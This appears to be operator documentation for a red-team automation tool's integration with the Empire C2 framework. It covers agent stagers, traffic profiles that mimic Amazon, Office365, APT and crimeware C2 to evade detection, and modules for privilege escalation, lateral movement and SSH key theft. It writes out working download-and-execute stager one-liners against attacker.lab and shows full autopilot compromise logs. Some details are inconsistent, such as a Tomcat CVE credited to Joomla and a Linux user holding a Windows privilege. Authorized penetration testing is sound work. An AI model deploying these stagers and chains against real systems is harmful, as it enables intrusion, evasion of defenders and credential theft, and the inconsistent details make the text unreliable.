| title | Empire C2 Integration | |||
|---|---|---|---|---|
| audience |
|
|||
| primary | operators | |||
| stability | stable | |||
| last_audited | 2026-05 | |||
| related |
|
Overview. Drederick integrates with BC-SECURITY/Empire — a full-featured post-exploitation C2 framework — for agent delivery, multi-module execution (privilege escalation, lateral movement), and session orchestration. This document covers agent types, deployment workflows, module strategies, and common operational patterns.
Empire integration follows a three-stage payload chain:
[Recon/Exploitation] → [Agent Stager] → [Empire Listener] → [Agent Callback] → [Post-Ex Modules]
-
Recon/Exploitation phase: Drederick's scanner suite identifies RCE opportunities (vulnerable services, weak credentials, misconfigurations).
-
Agent Stager (
EmpireAgentStager): Platform-aware payload generation.- Windows: PowerShell-based agent (Empire default)
- Linux: Python-based agent (compatible with Python 2/3)
- macOS: Bash/sh fallback (Empire one-liner)
- Output: raw stager code + delivery mechanism (HTTP, DNS, SMB)
-
Empire Listener (user-provisioned, not auto-started): HTTP/HTTPS listener awaiting agent callback.
- Listens on configured host:port (e.g.,
http://attacker.lab:8080/) - Receives agent check-ins and dispatches commands
- Listens on configured host:port (e.g.,
-
Agent Callback: Stager executes on target → calls back to listener → becomes active agent in Empire.
- Empire tracks agent:
<agent_id>, platform, username, hostname, processes
- Empire tracks agent:
-
Post-Ex Modules: Chain of privilege escalation, lateral movement, and enumeration.
- Privilege Escalation:
windows/escalate/bypassuac,windows/privesc/seimpersonate_potato,linux/escalate/sudo_privesc,linux/escalate/suid_finder - Lateral Movement:
windows/lateral/invoke_psremoting,windows/lateral/invoke_wmi,linux/lateral/ssh_add_authorized_keys - Enumeration:
windows/enum/enum_services,linux/enum/enum_network
- Privilege Escalation:
Overview. Drederick integrates the BC-SECURITY/Malleable-C2-Profiles repository to provide traffic obfuscation and operational security. Malleable C2 profiles allow Empire agents to mimic legitimate network traffic patterns (Amazon, Office365, APT actors) to evade detection.
| Category | Purpose | Example Profiles | Use Case |
|---|---|---|---|
| Normal | Mimic legitimate services | amazon, office365_calendar, stackoverflow, microsoftupdate |
Stealth operations, blend with corporate traffic |
| APT | Mimic nation-state actors | apt29_dukes, sofacy, apt10_chches |
Red team APT simulation, threat intel validation |
| Crimeware | Mimic malware campaigns | emotet, trickbot, bazarloader, qakbot |
Purple team exercises, defensive tuning |
Automatic (Recommended):
// Drederick selects optimal profile based on operational context
var stager = new EmpireAgentStager(scope, audit);
var result = await stager.GenerateAsync(target, platform: "windows");
// Auto-selects stealth profile (e.g., amazon.profile)Manual (Explicit):
// Operator chooses specific profile
var stager = new EmpireAgentStager(scope, audit);
var result = await stager.GenerateAsync(
target: "192.168.1.100",
platform: "windows",
profileName: "office365_calendar");List Available Profiles:
var stager = new EmpireAgentStager(scope, audit);
var profiles = stager.ListAvailableProfiles();
foreach (var profile in profiles)
{
Console.WriteLine($"{profile.Name} ({profile.Category}): {profile.Description}");
}
// Output:
// amazon (Normal): Amazon browsing traffic profile
// apt29_dukes (APT): APT29/Dukes actor traffic profile
// emotet (Crimeware): Emotet malware campaign profileDrederick provides smart profile selection based on operational context:
public enum OperationalContext
{
Stealth, // Max stealth → amazon.profile
APTSimulation, // APT actor → apt29_dukes.profile
RedTeam, // Red team → office365_calendar.profile
Testing // Lab → randomized.profile
}Loading a Profile:
var apiClient = new EmpireApiClient("https://empire-server:1337", authToken);
var profileLibrary = new MalleableProfileLibrary();
var profile = profileLibrary.GetProfile("amazon");
var profileContent = await profileLibrary.ReadProfileContentAsync(profile);
var result = await apiClient.LoadMalleableProfileAsync(profileContent, "amazon");
// Empire now has the profile loaded for listener creationCreating a Listener with Profile:
var listener = await apiClient.CreateListenerWithProfileAsync(
listenerName: "http-amazon",
listenerType: "http",
host: "192.168.1.50",
port: 8080,
profileName: "amazon");
// Listener mimics Amazon browsing traffic| Scenario | Recommended Profile | Rationale |
|---|---|---|
| Corporate network pentest | office365_calendar |
Office365 is ubiquitous, low suspicion |
| E-commerce target | amazon |
Legitimate shopping traffic |
| Healthcare target | mayoclinic |
Health info lookups are common |
| APT simulation (Russia) | apt29_dukes |
Mimics known Russian APT tradecraft |
| APT simulation (China) | apt10_chches |
Mimics known Chinese APT tradecraft |
| Purple team (ransomware) | emotet or trickbot |
Test defenses against known malware C2 |
| Lab/CTF | randomized |
No specific OPSEC requirement |
The Malleable-C2-Profiles are included as a git submodule:
# Update to latest profiles
cd src/Drederick/Exploit/Empire/profiles
git pull origin master
# Add new profiles manually (if needed)
cp my-custom.profile src/Drederick/Exploit/Empire/profiles/Normal/| Type | Platform | Requirements | Speed | Features |
|---|---|---|---|---|
| PowerShell (default Windows) | Windows | PowerShell v2+ | Fast | AMSI bypass, UAC handling, full Win32 API |
| Stager (Windows) | Windows | cmd.exe | Fast | Bootstrap → full agent download |
| Python 3 (default Linux) | Linux/macOS | Python 3.6+ | Medium | Multithreaded, cross-platform |
| Python 2 (legacy Linux) | Linux/macOS | Python 2.7 | Medium | Older systems, Metasploitable |
| Bash (fallback) | Linux/macOS | bash/sh | Slow | No dependencies, lowest common denominator |
drederick --scope <scope_file> --target <target_subnet> --out out/
# Scans yield: vulnerable service + credential/RCE path
# Example: Apache Tomcat 8.5.50 (CVE-2020-1938) → exec() capability on <target>Drederick's exploit toolbox may deliver pre-authenticated RCE directly (via Nuclei, Metasploit, custom PoC) or identify a valid credential pair (spray, brute-force, LDAP null bind).
# Via Autopilot (automatic):
drederick --autopilot --scope <scope> --target <target> --out out/
# Via manual invocation (operator control):
drederick run-exploit --tool empireStager --target <host> --platform windows --out out/<host>/
# Operator copy-pastes raw payload code to target (HTTP POST, bash -c, powershell -Command, etc.)Output: Raw stager code (PowerShell one-liner, Python script, bash payload)
written to out/<host>/empire_stager_<timestamp>.ps1|.py|.sh.
On target (operator pastes stager):
# Windows PowerShell example
powershell -NoProfile -NonInteractive -Command "IEX (New-Object System.Net.WebClient).DownloadString('http://attacker.lab:8080/stager')"
# Empire's stager downloads full agent, injects into memory, begins callback loop# Linux bash example
bash -c 'python -c "import requests; exec(requests.get(\"http://attacker.lab:8080/stager\").text)"'On Empire Listener (attacker's C2 server):
[*] Received agent callback from 192.168.1.100 (username: admin, hostname: WEBSERVER01)
[*] Agent registered: 3KWJXK8L [Windows PowerShell]
[*] Initial checkin received.
Automated (Autopilot + KnowledgeBase):
// EmpireModuleExecutor picks high-value modules based on findings
// Privilege escalation (if not SYSTEM): SeImpersonate → Potato, UAC bypass
// Lateral movement (if additional hosts in scope): credential spray, WMI/PSRemoting
// All re-check scope before executionManual (operator in Empire console):
[agent-3KWJXK8L] > info windows/escalate/bypassuac_servertech
[INFO] Targets UAC bypass on Windows Server 2012/2016 via ServerTech auth
[agent-3KWJXK8L] > use windows/escalate/bypassuac_servertech
[agent-3KWJXK8L] > set TARGET 192.168.1.100
[agent-3KWJXK8L] > run
[*] Executing module...
[*] UAC bypass successful, elevated to SYSTEM.
| Module | Vulnerability | Prerequisites | Success Signal |
|---|---|---|---|
windows/escalate/bypassuac_servertech |
ServerTech auth token reuse | Unprivileged user, x64 process | whoami returns SYSTEM |
windows/escalate/seimpersonate_potato |
SeImpersonate → Potato exploit | SeImpersonate privilege present | SYSTEM shell callback |
windows/escalate/bypassuac_token_duplication |
Token duplication (Alt+Tab) | Unprivileged, SeImpersonate | SYSTEM shell |
windows/escalate/get_token_impersonation |
Token enumeration for impersonation | SeImpersonate, process access | Lists impersonation tokens |
windows/escalate/rotten_potato |
Legacy Potato (older OS targets) | SeImpersonate, Windows 7-2012 | SYSTEM shell |
| Module | Vulnerability | Prerequisites | Success Signal |
|---|---|---|---|
linux/escalate/sudo_privesc |
Sudo + NOPASSWD or known password | Sudo entry exists | UID 0 shell |
linux/escalate/suid_finder |
SUID binary exploitation | Misconfigured SUID binary | UID 0 shell |
linux/escalate/polkit_dbus |
Polkit D-Bus privilege escalation | Polkit service + auth bypass | UID 0 shell |
linux/escalate/kernel_exploit |
Kernel vulnerability (CVE-driven) | Vulnerable kernel version | UID 0 shell / local priv esc |
| Module | Attack Type | Prerequisites | Target Type |
|---|---|---|---|
windows/lateral/invoke_psremoting |
WinRM multi-hop | PSRemoting enabled, valid creds | Windows (remote RCE) |
windows/lateral/invoke_wmi |
WMI remote execution | DCOM/WMI enabled, valid creds | Windows (remote RCE) |
windows/lateral/invoke_dcom |
DCOM lateral movement | DCOM enabled, valid creds | Windows (remote RCE) |
linux/lateral/ssh_add_authorized_keys |
SSH key-based access | SSH service, valid creds | Linux (persistent SSH) |
linux/lateral/steal_ssh_keys |
Steal SSH private keys | SSH keys readable from filesystem | Linux (steal keys for pivot) |
| Module | Discovery Type | Output |
|---|---|---|
windows/enum/enum_services |
Service enumeration | Service name, status, binary path |
windows/enum/enum_network |
Network enumeration | Local interfaces, routes, connections |
linux/enum/find_files |
File discovery | Sensitive files (passwd, shadow, .ssh) |
linux/enum/enum_suid |
SUID binaries | Misconfigurations for privesc |
Scenario: Nuclei finds vulnerable Joomla → RCE via mod_system. Want full post-ex capability.
// Drederick Autopilot:
var planner = new ExploitationPlanner(scope, audit, permissions);
var action = planner.Plan(findings)[0]; // RCE via Joomla
await exploitRunner.ExecuteAsync(action); // Nuclei RCE executes
// Post-RCE: deploy Empire agent
var stager = new EmpireAgentStager(scope, audit);
var result = await stager.GenerateAsync("192.168.1.50", Platform.Linux, ct);
// Deliver to target via stdout of Nuclei RCE
// Agent callbacks to Empire listener
// KnowledgeBase records: empire_agents += { target: "192.168.1.50", agent_id: "...", platform: Linux }Scenario: Agent on 192.168.1.100 has SeImpersonate. Need SYSTEM for lateral movement.
// EmpireModuleExecutor:
var findings = await sessionManager.EnumerateAsync("agent-123", ct);
// PostExWindows detects: SeImpersonate privilege, user is not SYSTEM
var executor = new EmpireModuleExecutor(scope, audit, moduleLibrary);
var result = await executor.ExecutePrivescAsync("192.168.1.100", findings, ct);
// Selects module: windows/escalate/seimpersonate_potato
// Re-checks scope: 192.168.1.100 ✓ in scope
// Executes in Empire: [agent-123] > use windows/escalate/seimpersonate_potato
// Success: agent now runs as SYSTEM
// Records to KnowledgeBase: Hosts["192.168.1.100"].PostExFindings += { privileged: true, method: "potato" }Scenario: First run identified 10 hosts + escalated on 5. Second run should skip escalation, focus on lateral.
// On run 2:
var kb = KnowledgeBase.Load("memory/findings.json");
var hosts = kb.Hosts.Values
.Where(h => h.PostExFindings.Any(f => f.Privileged == true))
.ToList();
// Loads: [ 192.168.1.10, 192.168.1.20, 192.168.1.30, 192.168.1.40, 192.168.1.50 ]
// Planner skips privesc modules for these hosts, focuses on lateral
var planLateral = planner.Plan(findings, creds, permissions)
.Where(a => a.Tool == "empireLateral")
.ToList();
// Lateral movement chain: credential spray → WMI invoke → agent callback → repeatSymptom: Stager executes, but agent never checks in to Empire listener.
Diagnosis:
- Verify listener is running:
[*] Started listener on http://attacker.lab:8080/ - Check target firewall: can target reach attacker.lab:8080?
- Verify platform match: PowerShell stager on Linux won't work (falls back to bash)
Fix:
- Confirm listener host/port in stager generation
- Test target connectivity:
curl http://attacker.lab:8080/testfrom target - Use Python agent on Linux if bash stager fails
Symptom: [ERROR] Module 'windows/escalate/seimpersonate_potato' not found
Diagnosis: Empire installation incomplete or custom module path not configured.
Fix:
# In Empire container/install:
cd /opt/Empire
pip install -r requirements.txt
python3 empire/server/server.pySymptom: Potato exploit runs, but user remains unprivileged.
Diagnosis:
- SeImpersonate not actually present (misidentified by post-ex)
- Token binding already used by another process
- OS patch level too new (Potato patched on Windows Server 2016+)
Fix:
- Verify:
whoami /groups | find "SeImpersonate"on target - Try alternative:
windows/escalate/bypassuac_token_duplication - Escalate via web server privilege (Tomcat → SYSTEM, IIS → NetworkService → SYSTEM)
Symptom: WMI lateral move executed, but connection refused.
Diagnosis:
- DCOM disabled in target environment
- Firewall (RPC ports 135, 445, dynamic range blocked)
- Invalid credentials (password changed since first compromise)
Fix:
- Confirm credentials are fresh: re-run password spray on target
- Try alternate:
windows/lateral/invoke_psremoting(different transport) - Enumerate available methods:
windows/enum/enum_connectivity
drederick \
--scope joomla-lab.txt \
--target 192.168.1.0/24 \
--autopilot \
--allow-payloads \
--out out/Output log:
[*] Scanning 192.168.1.50 (Joomla instance)
[*] Nuclei found: CVE-2020-1938 RCE via mod_system
[*] Exploiting: /component/com_system/...
[*] RCE shell on 192.168.1.50
[+] Autopilot Phase 1: Post-ex enumeration
[*] Detected: SeImpersonate privilege (user: www-data)
[+] Autopilot Phase 2: Empire agent delivery
[*] Generated stager: python (Linux)
[*] Delivered via RCE: python stager
[*] Agent callback: 3KWJXK8L [192.168.1.50]
[+] Autopilot Phase 3: Privilege escalation
[*] Empire module: windows/escalate/seimpersonate_potato (not applicable on Linux)
[*] Empire module: linux/escalate/sudo_privesc (www-data in sudoers)
[*] Executed module: sudo -u root /bin/bash -c "..."
[+] Escalation successful → UID 0
[+] Autopilot Phase 4: Lateral movement
[*] Credential spray: ubuntu/ubuntu on 192.168.1.0/24
[*] Lateral move: SSH to 192.168.1.51 (Ubuntu server)
[*] New agent callback: 4LMWQW2K [192.168.1.51]
[+] Autopilot finished: 2 agents, 1 escalation, 1 lateral move
// Operator code (not in Drederick, but shows integration point):
var executor = new EmpireModuleExecutor(scope, audit, moduleLibrary);
// Retrieve findings from prior enumeration
var findings = new HostFinding { Target = "192.168.1.100" };
findings.PostExFindings = new()
{
new() { Privileged = false, User = "WEBSERVER$", Privileges = "SeImpersonate" }
};
// Execute privesc module
var result = await executor.ExecutePrivescAsync("192.168.1.100", findings, ct);
if (result.Success)
{
Console.WriteLine($"Escalated to: {result.Output}");
kb.RecordEmpireModuleSuccess("192.168.1.100", result.ModuleName, result.Output);
}Run 1:
drederick --scope lab.txt --target 10.0.0.0/8 --autopilot --out out/
# Results: 15 hosts compromised, 8 escalated, 3 lateral moves
# Recorded to memory/findings.jsonRun 2 (next day, focus on high-value targets):
drederick --scope lab.txt --target 10.0.0.0/8 --autopilot --out out/
# Loads memory/findings.json
# Skips re-escalation on already-SYSTEM hosts
# Focuses on: credential reuse → new hosts → new lateral moves- Listener auto-start: Empire listener must be running manually. Drederick does not start/stop C2 server.
- Module corpus: Hardcoded module suggestions (string matching). Real implementation should integrate with Empire's
core/handlersAPI. - Callback routing: Single listener required. Multi-listener / listener failover not yet implemented.
- Agent auto-sleep: Agents callback continuously. Operator must disable via
agent <id> command sleep <minutes>. - Stealth: No OPSEC hardening in stagers (encoding, obfuscation, certificate pinning).
- Listener orchestration: Auto-start Empire server, return listener URL to stager
- Module API integration: Query
empire/handlersfor available modules, match against findings - Callback tunneling: Route agent callbacks through Drederick's network isolation layer
- OPSEC profile auto-rotation: Per-stage profile rotation and certificate pinning on top of the bundled Malleable C2 corpus already shipped via
MalleableProfileLibrary. - Lateral move simulation: Pre-flight test lateral movement paths before execution